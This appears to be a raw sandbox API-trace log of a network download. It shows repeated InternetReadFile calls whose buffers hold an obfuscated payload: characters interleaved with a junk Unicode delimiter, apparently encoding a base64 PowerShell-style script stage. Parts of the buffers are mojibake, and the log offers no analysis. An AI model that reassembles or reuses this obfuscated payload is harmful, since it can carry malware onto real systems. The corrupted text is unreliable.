⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏeмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎNмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмá
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ¨²á‡•áŠ¥áŽ‡á‡«á®žâ­â™â˜±âŸŽâ¡³á³šË•ÒŽ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎKмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ7мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ5мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎSмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ5мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ6мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏhмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎKмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0Ð
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ¼á¨²á‡•áŠ¥áŽ‡á‡«á®žâ­â™â˜±âŸŽâ¡³á³šË•ÒŽ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐â™
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: â˜±âŸŽâ¡³á³šË•ÒŽGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏjмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐